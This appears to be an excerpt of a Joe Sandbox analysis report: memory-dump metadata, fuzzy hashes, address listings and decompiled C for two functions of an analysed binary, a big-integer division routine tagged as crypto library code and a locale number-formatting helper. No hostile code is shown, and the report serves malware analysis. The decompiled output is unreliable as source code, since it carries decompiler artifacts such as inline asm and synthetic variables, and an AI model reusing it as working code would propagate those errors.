                                                    0x00ceb40d
                                                    0x00ceb40f
                                                    0x00ceb411
                                                    0x00ceb413
                                                    0x00ceb41e
                                                    0x00000000
                                                    0x00ceb41e
                                                    0x00ceb413
                                                    0x00ceb40f
                                                    0x00000000
                                                    0x00ceb40b
                                                    0x00ceb424
                                                    0x00ceb426
                                                    0x00ceb429
                                                    0x00ceb442
                                                    0x00ceb442
                                                    0x00ceb444
                                                    0x00ceb447
                                                    0x00ceb457
                                                    0x00ceb459
                                                    0x00ceb459
                                                    0x00ceb449
                                                    0x00ceb449
                                                    0x00ceb44c
                                                    0x00000000
                                                    0x00ceb44e
                                                    0x00ceb44e
                                                    0x00ceb451
                                                    0x00000000
                                                    0x00ceb453
                                                    0x00ceb453
                                                    0x00ceb453
                                                    0x00ceb451
                                                    0x00ceb44c
                                                    0x00ceb45f
                                                    0x00ceb467
                                                    0x00ceb46b
                                                    0x00ceb479
                                                    0x00ceb47e
                                                    0x00ceb493
                                                    0x00ceb495
                                                    0x00ceb49b
                                                    0x00ceb49e
                                                    0x00ceb4d0
                                                    0x00ceb4d0
                                                    0x00ceb4d2
                                                    0x00ceb4d5
                                                    0x00ceb4db
                                                    0x00ceb4db
                                                    0x00ceb4e2
                                                    0x00ceb4fc
                                                    0x00ceb4fc
                                                    0x00ceb50b
                                                    0x00ceb510
                                                    0x00ceb513
                                                    0x00ceb515
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ceb4e4
                                                    0x00ceb4e4
                                                    0x00ceb4ea
                                                    0x00ceb4ec
                                                    0x00000000
                                                    0x00ceb4ee
                                                    0x00ceb4ee
                                                    0x00ceb4f1
                                                    0x00000000
                                                    0x00ceb4f3
                                                    0x00ceb4f3
                                                    0x00ceb4fa
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ceb4fa
                                                    0x00ceb4f1
                                                    0x00ceb4ec
                                                    0x00000000
                                                    0x00ceb517
                                                    0x00ceb51f
                                                    0x00ceb525
                                                    0x00ceb527
                                                    0x00ceb527
                                                    0x00ceb52f
                                                    0x00ceb534
                                                    0x00ceb53c
                                                    0x00ceb53f
                                                    0x00ceb541
                                                    0x00ceb555
                                                    0x00ceb55a
                                                    0x00ceb4a0
                                                    0x00ceb4a0
                                                    0x00ceb4a4
                                                    0x00ceb4ac
                                                    0x00ceb4ac
                                                    0x00ceb4ac
                                                    0x00ceb4ae
                                                    0x00ceb4b1
                                                    0x00ceb4b4
                                                    0x00ceb4b4
                                                    0x00ceb4ba
                                                    0x00ceb42b
                                                    0x00ceb42e
                                                    0x00ceb430
                                                    0x00000000
                                                    0x00ceb432
                                                    0x00ceb432
                                                    0x00ceb438
                                                    0x00ceb43d
                                                    0x00ceb430
                                                    0x00ceb4bf
                                                    0x00ceb4c0
                                                    0x00ceb4c1
                                                    0x00ceb4c3
                                                    0x00ceb4cc
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ceb39a
                                                    0x00ceb36e
                                                    0x00ceb370
                                                    0x00ceb3cc
                                                    0x00ceb3d0
                                                    0x00ceb3d0
                                                    0x00000000

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .
                                                    • API String ID: 0-248832578
                                                    • Opcode ID: cd2367347146fc7543762e54b040c93cd61d6b7d52421c0a80a29c1405c9b095
                                                    • Instruction ID: cff68884e002fb3dbcacaa3b5fa0b45133bf780ec306a264a233510e71d1a326
                                                    • Opcode Fuzzy Hash: cd2367347146fc7543762e54b040c93cd61d6b7d52421c0a80a29c1405c9b095
                                                    • Instruction Fuzzy Hash: 9731E9719002896FCB249E7ACC85EFB7BBDDF85314F1441A8F529D7292E7309E458B50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CED440 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODECrypto
                                                    Download Yara Rule
                                                    C-Code - Quality: 90%
                                                    			E00CED440(signed int* _a4, signed int* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int* _v80;
				char _v540;
				signed int _v544;
				signed int _t197;
				signed int _t198;
				signed int* _t200;
				signed int _t201;
				signed int _t204;
				signed int _t206;
				signed int _t208;
				signed int _t209;
				signed int _t213;
				signed int _t219;
				intOrPtr _t225;
				void* _t228;
				signed int _t230;
				signed int _t247;
				signed int _t250;
				void* _t253;
				signed int _t256;
				signed int* _t262;
				signed int _t263;
				signed int _t264;
				void* _t265;
				intOrPtr* _t266;
				signed int _t267;
				signed int _t269;
				signed int _t270;
				signed int _t271;
				signed int _t272;
				signed int* _t274;
				signed int* _t278;
				signed int _t279;
				signed int _t280;
				intOrPtr _t282;
				void* _t286;
				signed char _t292;
				signed int _t295;
				signed int _t303;
				signed int _t306;
				signed int _t307;
				signed int _t309;
				signed int _t311;
				signed int _t313;
				intOrPtr* _t314;
				signed int _t318;
				signed int _t322;
				signed int* _t328;
				signed int _t330;
				signed int _t331;
				signed int _t333;
				void* _t334;
				signed int _t336;
				signed int _t338;
				signed int _t341;
				signed int _t342;
				signed int* _t344;
				signed int _t349;
				signed int _t351;
				void* _t355;
				signed int _t359;
				signed int _t360;
				signed int _t362;
				signed int* _t368;
				signed int* _t369;
				signed int* _t370;
				signed int* _t373;

				_t262 = _a4;
				_t197 =  *_t262;
				if(_t197 != 0) {
					_t328 = _a8;
					_t267 =  *_t328;
					__eflags = _t267;
					if(_t267 != 0) {
						_t3 = _t197 - 1; // -1
						_t349 = _t3;
						_t4 = _t267 - 1; // -1
						_t198 = _t4;
						_v16 = _t349;
						__eflags = _t198;
						if(_t198 != 0) {
							__eflags = _t198 - _t349;
							if(_t198 > _t349) {
								L23:
								__eflags = 0;
								return 0;
							} else {
								_t46 = _t198 + 1; // 0x0
								_t306 = _t349 - _t198;
								_v60 = _t46;
								_t269 = _t349;
								__eflags = _t349 - _t306;
								if(_t349 < _t306) {
									L21:
									_t306 = _t306 + 1;
									__eflags = _t306;
								} else {
									_t368 =  &(_t262[_t349 + 1]);
									_t341 =  &(( &(_t328[_t269 - _t306]))[1]);
									__eflags = _t341;
									while(1) {
										__eflags =  *_t341 -  *_t368;
										if( *_t341 !=  *_t368) {
											break;
										}
										_t269 = _t269 - 1;
										_t341 = _t341 - 4;
										_t368 = _t368 - 4;
										__eflags = _t269 - _t306;
										if(_t269 >= _t306) {
											continue;
										} else {
											goto L21;
										}
										goto L22;
									}
									_t369 = _a8;
									_t54 = (_t269 - _t306) * 4; // 0xfc23b5a
									__eflags =  *((intOrPtr*)(_t369 + _t54 + 4)) -  *((intOrPtr*)(_t262 + 4 + _t269 * 4));
									if( *((intOrPtr*)(_t369 + _t54 + 4)) <  *((intOrPtr*)(_t262 + 4 + _t269 * 4))) {
										goto L21;
									}
								}
								L22:
								__eflags = _t306;
								if(__eflags != 0) {
									_t330 = _v60;
									_t200 = _a8;
									_t351 =  *(_t200 + _t330 * 4);
									_t64 = _t330 * 4; // 0xffffe9e5
									_t201 =  *((intOrPtr*)(_t200 + _t64 - 4));
									_v36 = _t201;
									asm("bsr eax, esi");
									_v56 = _t351;
									if(__eflags == 0) {
										_t270 = 0x20;
									} else {
										_t270 = 0x1f - _t201;
									}
									_v40 = _t270;
									_v64 = 0x20 - _t270;
									__eflags = _t270;
									if(_t270 != 0) {
										_t292 = _v40;
										_v36 = _v36 << _t292;
										_v56 = _t351 << _t292 | _v36 >> _v64;
										__eflags = _t330 - 2;
										if(_t330 > 2) {
											_t79 = _t330 * 4; // 0xe850ffff
											_t81 =  &_v36;
											 *_t81 = _v36 |  *(_a8 + _t79 - 8) >> _v64;
											__eflags =  *_t81;
										}
									}
									_v76 = 0;
									_t307 = _t306 + 0xffffffff;
									__eflags = _t307;
									_v32 = _t307;
									if(_t307 < 0) {
										_t331 = 0;
										__eflags = 0;
									} else {
										_t85 =  &(_t262[1]); // 0x4
										_v20 =  &(_t85[_t307]);
										_t206 = _t307 + _t330;
										_t90 = _t262 - 4; // -4
										_v12 = _t206;
										_t278 = _t90 + _t206 * 4;
										_v80 = _t278;
										do {
											__eflags = _t206 - _v16;
											if(_t206 > _v16) {
												_t207 = 0;
												__eflags = 0;
											} else {
												_t207 = _t278[2];
											}
											__eflags = _v40;
											_t311 = _t278[1];
											_t279 =  *_t278;
											_v52 = _t207;
											_v44 = 0;
											_v8 = _t207;
											_v24 = _t279;
											if(_v40 > 0) {
												_t318 = _v8;
												_t336 = _t279 >> _v64;
												_t230 = E00CDF0C0(_t311, _v40, _t318);
												_t279 = _v40;
												_t207 = _t318;
												_t311 = _t336 | _t230;
												_t359 = _v24 << _t279;
												__eflags = _v12 - 3;
												_v8 = _t318;
												_v24 = _t359;
												if(_v12 >= 3) {
													_t279 = _v64;
													_t360 = _t359 |  *(_t262 + (_v60 + _v32) * 4 - 8) >> _t279;
													__eflags = _t360;
													_t207 = _v8;
													_v24 = _t360;
												}
											}
											_t208 = E00CF21C0(_t311, _t207, _v56, 0);
											_v44 = _t262;
											_t263 = _t208;
											_v44 = 0;
											_t209 = _t311;
											_v8 = _t263;
											_v28 = _t209;
											_t333 = _t279;
											_v72 = _t263;
											_v68 = _t209;
											__eflags = _t209;
											if(_t209 != 0) {
												L40:
												_t264 = _t263 + 1;
												asm("adc eax, 0xffffffff");
												_t333 = _t333 + E00CDF0E0(_t264, _t209, _v56, 0);
												asm("adc esi, edx");
												_t263 = _t264 | 0xffffffff;
												_t209 = 0;
												__eflags = 0;
												_v44 = 0;
												_v8 = _t263;
												_v72 = _t263;
												_v28 = 0;
												_v68 = 0;
											} else {
												__eflags = _t263 - 0xffffffff;
												if(_t263 > 0xffffffff) {
													goto L40;
												}
											}
											__eflags = 0;
											if(0 <= 0) {
												if(0 < 0) {
													goto L44;
												} else {
													__eflags = _t333 - 0xffffffff;
													if(_t333 <= 0xffffffff) {
														while(1) {
															L44:
															_v8 = _v24;
															_t228 = E00CDF0E0(_v36, 0, _t263, _t209);
															__eflags = _t311 - _t333;
															if(__eflags < 0) {
																break;
															}
															if(__eflags > 0) {
																L47:
																_t209 = _v28;
																_t263 = _t263 + 0xffffffff;
																_v72 = _t263;
																asm("adc eax, 0xffffffff");
																_t333 = _t333 + _v56;
																__eflags = _t333;
																_v28 = _t209;
																asm("adc dword [ebp-0x28], 0x0");
																_v68 = _t209;
																if(_t333 == 0) {
																	__eflags = _t333 - 0xffffffff;
																	if(_t333 <= 0xffffffff) {
																		continue;
																	} else {
																	}
																}
															} else {
																__eflags = _t228 - _v8;
																if(_t228 <= _v8) {
																	break;
																} else {
																	goto L47;
																}
															}
															L51:
															_v8 = _t263;
															goto L52;
														}
														_t209 = _v28;
														goto L51;
													}
												}
											}
											L52:
											__eflags = _t209;
											if(_t209 != 0) {
												L54:
												_t280 = _v60;
												_t334 = 0;
												_t355 = 0;
												__eflags = _t280;
												if(_t280 != 0) {
													_t266 = _v20;
													_t219 =  &(_a8[1]);
													__eflags = _t219;
													_v24 = _t219;
													_v16 = _t280;
													do {
														_v44 =  *_t219;
														_t225 =  *_t266;
														_t286 = _t334 + _v72 * _v44;
														asm("adc esi, edx");
														_t334 = _t355;
														_t355 = 0;
														__eflags = _t225 - _t286;
														if(_t225 < _t286) {
															_t334 = _t334 + 1;
															asm("adc esi, esi");
														}
														 *_t266 = _t225 - _t286;
														_t266 = _t266 + 4;
														_t219 = _v24 + 4;
														_t164 =  &_v16;
														 *_t164 = _v16 - 1;
														__eflags =  *_t164;
														_v24 = _t219;
													} while ( *_t164 != 0);
													_t263 = _v8;
													_t280 = _v60;
												}
												__eflags = 0 - _t355;
												if(__eflags <= 0) {
													if(__eflags < 0) {
														L63:
														__eflags = _t280;
														if(_t280 != 0) {
															_t338 = _t280;
															_t314 = _v20;
															_t362 =  &(_a8[1]);
															__eflags = _t362;
															_t265 = 0;
															do {
																_t282 =  *_t314;
																_t172 = _t362 + 4; // 0xa6a5959
																_t362 = _t172;
																_t314 = _t314 + 4;
																asm("adc eax, eax");
																 *((intOrPtr*)(_t314 - 4)) = _t282 +  *((intOrPtr*)(_t362 - 4)) + _t265;
																asm("adc eax, 0x0");
																_t265 = 0;
																_t338 = _t338 - 1;
																__eflags = _t338;
															} while (_t338 != 0);
															_t263 = _v8;
														}
														_t263 = _t263 + 0xffffffff;
														asm("adc dword [ebp-0x18], 0xffffffff");
													} else {
														__eflags = _v52 - _t334;
														if(_v52 < _t334) {
															goto L63;
														}
													}
												}
												_t213 = _v12 - 1;
												__eflags = _t213;
												_v16 = _t213;
											} else {
												__eflags = _t263;
												if(_t263 != 0) {
													goto L54;
												}
											}
											_t331 = 0 + _t263;
											asm("adc esi, 0x0");
											_v20 = _v20 - 4;
											_t313 = _v32 - 1;
											_t262 = _a4;
											_t278 = _v80 - 4;
											_t206 = _v12 - 1;
											_v76 = _t331;
											_v32 = _t313;
											_v80 = _t278;
											_v12 = _t206;
											__eflags = _t313;
										} while (_t313 >= 0);
									}
									_t309 = _v16 + 1;
									_t204 = _t309;
									__eflags = _t204 -  *_t262;
									if(_t204 <  *_t262) {
										_t191 = _t204 + 1; // 0xceea5d
										_t274 =  &(_t262[_t191]);
										do {
											 *_t274 = 0;
											_t194 =  &(_t274[1]); // 0x91850fc2
											_t274 = _t194;
											_t204 = _t204 + 1;
											__eflags = _t204 -  *_t262;
										} while (_t204 <  *_t262);
									}
									 *_t262 = _t309;
									__eflags = _t309;
									if(_t309 != 0) {
										while(1) {
											_t271 =  *_t262;
											__eflags = _t262[_t271];
											if(_t262[_t271] != 0) {
												goto L78;
											}
											_t272 = _t271 + 0xffffffff;
											__eflags = _t272;
											 *_t262 = _t272;
											if(_t272 != 0) {
												continue;
											}
											goto L78;
										}
									}
									L78:
									return _t331;
								} else {
									goto L23;
								}
							}
						} else {
							_t6 =  &(_t328[1]); // 0xfc23b5a
							_t295 =  *_t6;
							_v44 = _t295;
							__eflags = _t295 - 1;
							if(_t295 != 1) {
								__eflags = _t349;
								if(_t349 != 0) {
									_t342 = 0;
									_v12 = 0;
									_v8 = 0;
									_v20 = 0;
									__eflags = _t349 - 0xffffffff;
									if(_t349 != 0xffffffff) {
										_t250 = _v16 + 1;
										__eflags = _t250;
										_v32 = _t250;
										_t373 =  &(_t262[_t349 + 1]);
										do {
											_t253 = E00CF21C0( *_t373, _t342, _t295, 0);
											_v68 = _t303;
											_t373 = _t373 - 4;
											_v20 = _t262;
											_t342 = _t295;
											_t303 = 0 + _t253;
											asm("adc ecx, 0x0");
											_v12 = _t303;
											_t34 =  &_v32;
											 *_t34 = _v32 - 1;
											__eflags =  *_t34;
											_v8 = _v12;
											_t295 = _v44;
										} while ( *_t34 != 0);
										_t262 = _a4;
									}
									_v544 = 0;
									_t41 =  &(_t262[1]); // 0x4
									_t370 = _t41;
									 *_t262 = 0;
									E00CEBDE1(_t370, 0x1cc,  &_v540, 0);
									_t247 = _v20;
									__eflags = 0 - _t247;
									 *_t370 = _t342;
									_t262[2] = _t247;
									asm("sbb ecx, ecx");
									__eflags =  ~0x00000000;
									 *_t262 = 0xbadbae;
									return _v12;
								} else {
									_t14 =  &(_t262[1]); // 0x4
									_t344 = _t14;
									_v544 = 0;
									 *_t262 = 0;
									E00CEBDE1(_t344, 0x1cc,  &_v540, 0);
									_t256 = _t262[1];
									_t322 = _t256 % _v44;
									__eflags = 0 - _t322;
									 *_t344 = _t322;
									asm("sbb ecx, ecx");
									__eflags = 0;
									 *_t262 =  ~0x00000000;
									return _t256 / _v44;
								}
							} else {
								_t9 =  &(_t262[1]); // 0x4
								_v544 = _t198;
								 *_t262 = _t198;
								E00CEBDE1(_t9, 0x1cc,  &_v540, _t198);
								__eflags = 0;
								return _t262[1];
							}
						}
					} else {
						__eflags = 0;
						return 0;
					}
				} else {
					return _t197;
				}
			}























































































                                                    0x00ced44c
                                                    0x00ced44f
                                                    0x00ced453
                                                    0x00ced45d
                                                    0x00ced460
                                                    0x00ced462
                                                    0x00ced464
                                                    0x00ced471
                                                    0x00ced471
                                                    0x00ced474
                                                    0x00ced474
                                                    0x00ced477
                                                    0x00ced47a
                                                    0x00ced47c
                                                    0x00ced5af
                                                    0x00ced5b1
                                                    0x00ced5fa
                                                    0x00ced5fe
                                                    0x00ced604
                                                    0x00ced5b3
                                                    0x00ced5b5
                                                    0x00ced5b8
                                                    0x00ced5ba
                                                    0x00ced5bd
                                                    0x00ced5bf
                                                    0x00ced5c1
                                                    0x00ced5f5
                                                    0x00ced5f5
                                                    0x00ced5f5
                                                    0x00ced5c3
                                                    0x00ced5c8
                                                    0x00ced5ce
                                                    0x00ced5ce
                                                    0x00ced5d1
                                                    0x00ced5d3
                                                    0x00ced5d5
                                                    0x00000000
                                                    0x00000000
                                                    0x00ced5d7
                                                    0x00ced5d8
                                                    0x00ced5db
                                                    0x00ced5de
                                                    0x00ced5e0
                                                    0x00000000
                                                    0x00ced5e2
                                                    0x00000000
                                                    0x00ced5e2
                                                    0x00000000
                                                    0x00ced5e0
                                                    0x00ced5e4
                                                    0x00ced5eb
                                                    0x00ced5ef
                                                    0x00ced5f3
                                                    0x00000000
                                                    0x00000000
                                                    0x00ced5f3
                                                    0x00ced5f6
                                                    0x00ced5f6
                                                    0x00ced5f8
                                                    0x00ced605
                                                    0x00ced608
                                                    0x00ced60b
                                                    0x00ced60e
                                                    0x00ced60e
                                                    0x00ced612
                                                    0x00ced615
                                                    0x00ced618
                                                    0x00ced61b
                                                    0x00ced626
                                                    0x00ced61d
                                                    0x00ced622
                                                    0x00ced622
                                                    0x00ced630
                                                    0x00ced635
                                                    0x00ced638
                                                    0x00ced63a
                                                    0x00ced644
                                                    0x00ced647
                                                    0x00ced64e
                                                    0x00ced651
                                                    0x00ced654
                                                    0x00ced65c
                                                    0x00ced662
                                                    0x00ced662
                                                    0x00ced662
                                                    0x00ced662
                                                    0x00ced654
                                                    0x00ced667
                                                    0x00ced66e
                                                    0x00ced66e
                                                    0x00ced671
                                                    0x00ced674
                                                    0x00ced8a6
                                                    0x00ced8a6
                                                    0x00ced67a
                                                    0x00ced67a
                                                    0x00ced680
                                                    0x00ced683
                                                    0x00ced686
                                                    0x00ced689
                                                    0x00ced68c
                                                    0x00ced68f
                                                    0x00ced692
                                                    0x00ced692
                                                    0x00ced695
                                                    0x00ced69c
                                                    0x00ced69c
                                                    0x00ced697
                                                    0x00ced697
                                                    0x00ced697
                                                    0x00ced69e
                                                    0x00ced6a2
                                                    0x00ced6a5
                                                    0x00ced6a7
                                                    0x00ced6aa
                                                    0x00ced6b1
                                                    0x00ced6b4
                                                    0x00ced6b7
                                                    0x00ced6c2
                                                    0x00ced6c5
                                                    0x00ced6ca
                                                    0x00ced6cf
                                                    0x00ced6d6
                                                    0x00ced6db
                                                    0x00ced6dd
                                                    0x00ced6df
                                                    0x00ced6e3
                                                    0x00ced6e6
                                                    0x00ced6e9
                                                    0x00ced6f1
                                                    0x00ced6fa
                                                    0x00ced6fa
                                                    0x00ced6fc
                                                    0x00ced6ff
                                                    0x00ced6ff
                                                    0x00ced6e9
                                                    0x00ced709
                                                    0x00ced70e
                                                    0x00ced713
                                                    0x00ced715
                                                    0x00ced718
                                                    0x00ced71a
                                                    0x00ced71d
                                                    0x00ced720
                                                    0x00ced722
                                                    0x00ced725
                                                    0x00ced728
                                                    0x00ced72a
                                                    0x00ced731
                                                    0x00ced736
                                                    0x00ced739
                                                    0x00ced743
                                                    0x00ced745
                                                    0x00ced747
                                                    0x00ced74a
                                                    0x00ced74a
                                                    0x00ced74c
                                                    0x00ced74f
                                                    0x00ced752
                                                    0x00ced755
                                                    0x00ced758
                                                    0x00ced72c
                                                    0x00ced72c
                                                    0x00ced72f
                                                    0x00000000
                                                    0x00000000
                                                    0x00ced72f
                                                    0x00ced75b
                                                    0x00ced75d
                                                    0x00ced75f
                                                    0x00000000
                                                    0x00ced761
                                                    0x00ced761
                                                    0x00ced764
                                                    0x00ced766
                                                    0x00ced766
                                                    0x00ced774
                                                    0x00ced777
                                                    0x00ced77c
                                                    0x00ced77e
                                                    0x00000000
                                                    0x00000000
                                                    0x00ced780
                                                    0x00ced787
                                                    0x00ced787
                                                    0x00ced78a
                                                    0x00ced78d
                                                    0x00ced790
                                                    0x00ced793
                                                    0x00ced793
                                                    0x00ced796
                                                    0x00ced799
                                                    0x00ced79d
                                                    0x00ced7a0
                                                    0x00ced7a2
                                                    0x00ced7a5
                                                    0x00000000
                                                    0x00000000
                                                    0x00ced7a7
                                                    0x00ced7a5
                                                    0x00ced782
                                                    0x00ced782
                                                    0x00ced785
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ced785
                                                    0x00ced7ac
                                                    0x00ced7ac
                                                    0x00000000
                                                    0x00ced7ac
                                                    0x00ced7a9
                                                    0x00000000
                                                    0x00ced7a9
                                                    0x00ced764
                                                    0x00ced75f
                                                    0x00ced7af
                                                    0x00ced7af
                                                    0x00ced7b1
                                                    0x00ced7bb
                                                    0x00ced7bb
                                                    0x00ced7be
                                                    0x00ced7c0
                                                    0x00ced7c2
                                                    0x00ced7c4
                                                    0x00ced7c9
                                                    0x00ced7cc
                                                    0x00ced7cc
                                                    0x00ced7cf
                                                    0x00ced7d2
                                                    0x00ced7d5
                                                    0x00ced7d7
                                                    0x00ced7ec
                                                    0x00ced7ee
                                                    0x00ced7f0
                                                    0x00ced7f2
                                                    0x00ced7f4
                                                    0x00ced7f6
                                                    0x00ced7f8
                                                    0x00ced7fa
                                                    0x00ced7fd
                                                    0x00ced7fd
                                                    0x00ced801
                                                    0x00ced803
                                                    0x00ced809
                                                    0x00ced80c
                                                    0x00ced80c
                                                    0x00ced80c
                                                    0x00ced810
                                                    0x00ced810
                                                    0x00ced815
                                                    0x00ced818
                                                    0x00ced818
                                                    0x00ced81d
                                                    0x00ced81f
                                                    0x00ced821
                                                    0x00ced828
                                                    0x00ced828
                                                    0x00ced82a
                                                    0x00ced82f
                                                    0x00ced831
                                                    0x00ced834
                                                    0x00ced834
                                                    0x00ced837
                                                    0x00ced840
                                                    0x00ced840
                                                    0x00ced842
                                                    0x00ced842
                                                    0x00ced847
                                                    0x00ced84d
                                                    0x00ced851
                                                    0x00ced854
                                                    0x00ced857
                                                    0x00ced859
                                                    0x00ced859
                                                    0x00ced859
                                                    0x00ced85e
                                                    0x00ced85e
                                                    0x00ced861
                                                    0x00ced864
                                                    0x00ced823
                                                    0x00ced823
                                                    0x00ced826
                                                    0x00000000
                                                    0x00000000
                                                    0x00ced826
                                                    0x00ced821
                                                    0x00ced86b
                                                    0x00ced86b
                                                    0x00ced86c
                                                    0x00ced7b3
                                                    0x00ced7b3
                                                    0x00ced7b5
                                                    0x00000000
                                                    0x00000000
                                                    0x00ced7b5
                                                    0x00ced87c
                                                    0x00ced881
                                                    0x00ced884
                                                    0x00ced888
                                                    0x00ced889
                                                    0x00ced88c
                                                    0x00ced88f
                                                    0x00ced890
                                                    0x00ced893
                                                    0x00ced896
                                                    0x00ced899
                                                    0x00ced89c
                                                    0x00ced89c
                                                    0x00ced8a4
                                                    0x00ced8ab
                                                    0x00ced8ac
                                                    0x00ced8ae
                                                    0x00ced8b0
                                                    0x00ced8b2
                                                    0x00ced8b5
                                                    0x00ced8c0
                                                    0x00ced8c0
                                                    0x00ced8c6
                                                    0x00ced8c6
                                                    0x00ced8c9
                                                    0x00ced8ca
                                                    0x00ced8ca
                                                    0x00ced8c0
                                                    0x00ced8ce
                                                    0x00ced8d0
                                                    0x00ced8d2
                                                    0x00ced8d4
                                                    0x00ced8d4
                                                    0x00ced8d6
                                                    0x00ced8da
                                                    0x00000000
                                                    0x00000000
                                                    0x00ced8dc
                                                    0x00ced8dc
                                                    0x00ced8df
                                                    0x00ced8e1
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ced8e1
                                                    0x00ced8d4
                                                    0x00ced8e3
                                                    0x00ced8ed
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00ced5f8
                                                    0x00ced482
                                                    0x00ced482
                                                    0x00ced482
                                                    0x00ced485
                                                    0x00ced488
                                                    0x00ced48b
                                                    0x00ced4bc
                                                    0x00ced4be
                                                    0x00ced509
                                                    0x00ced50b
                                                    0x00ced512
                                                    0x00ced519
                                                    0x00ced51c
                                                    0x00ced51f
                                                    0x00ced525
                                                    0x00ced525
                                                    0x00ced526
                                                    0x00ced529
                                                    0x00ced530
                                                    0x00ced539
                                                    0x00ced53e
                                                    0x00ced541
                                                    0x00ced546
                                                    0x00ced549
                                                    0x00ced54b
                                                    0x00ced550
                                                    0x00ced553
                                                    0x00ced556
                                                    0x00ced556
                                                    0x00ced556
                                                    0x00ced55a
                                                    0x00ced55d
                                                    0x00ced55d
                                                    0x00ced562
                                                    0x00ced562
                                                    0x00ced56d
                                                    0x00ced578
                                                    0x00ced578
                                                    0x00ced57b
                                                    0x00ced587
                                                    0x00ced58c
                                                    0x00ced597
                                                    0x00ced599
                                                    0x00ced59b
                                                    0x00ced5a1
                                                    0x00ced5a6
                                                    0x00ced5a8
                                                    0x00ced5ae
                                                    0x00ced4c0
                                                    0x00ced4cc
                                                    0x00ced4cc
                                                    0x00ced4cf
                                                    0x00ced4df
                                                    0x00ced4e5
                                                    0x00ced4ec
                                                    0x00ced4ee
                                                    0x00ced4f6
                                                    0x00ced4f8
                                                    0x00ced4fa
                                                    0x00ced4ff
                                                    0x00ced502
                                                    0x00ced508
                                                    0x00ced508
                                                    0x00ced48d
                                                    0x00ced490
                                                    0x00ced494
                                                    0x00ced49a
                                                    0x00ced4a9
                                                    0x00ced4b3
                                                    0x00ced4bb
                                                    0x00ced4bb
                                                    0x00ced48b
                                                    0x00ced466
                                                    0x00ced469
                                                    0x00ced46f
                                                    0x00ced46f
                                                    0x00ced455
                                                    0x00ced45b
                                                    0x00ced45b

                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                    • Instruction ID: 7c510de64841e7e59483e8ffbea6c7aa83138824b2018a20e7987abacc7ac298
                                                    • Opcode Fuzzy Hash: aeb1b63111f38c8b5239956e5f87fb8bcb0c35bf5c950da3c1a86b78fccd596c
                                                    • Instruction Fuzzy Hash: 5F022D71E012199BDF14CFA9C8806ADB7F5FF48314F158269E92AE7384D731AE41CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CDAF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 100%
                                                    			E00CDAF0F(signed int _a4, signed int _a8, short* _a12, int _a16) {
				short _v104;
				short _v304;
				short* _t23;
				int _t24;

				if( *0xcfe73c == 0) {
					GetLocaleInfoW(0x400, 0xf,  &_v304, 0x64);
					 *0xd1fcb0 = _v304;
					 *0xd1fcb2 = 0;
					 *0xcfe73c = 0xd1fcb0;
				}
				E00CD04BD(_a4, _a8,  &_v104, 0x32);
				_t23 = _a12;
				_t24 = _a16;
				 *_t23 = 0;
				GetNumberFormatW(0x400, 0,  &_v104, 0xcfe72c, _t23, _t24);
				 *((short*)(_t23 + _t24 * 2 - 2)) = 0;
				return 0;
			}







                                                    0x00cdaf27
                                                    0x00cdaf35
                                                    0x00cdaf42
                                                    0x00cdaf4a
                                                    0x00cdaf50
                                                    0x00cdaf50
                                                    0x00cdaf66
                                                    0x00cdaf6b
                                                    0x00cdaf70
                                                    0x00cdaf7a
                                                    0x00cdaf84
                                                    0x00cdaf8c
                                                    0x00cdaf95

                                                    APIs
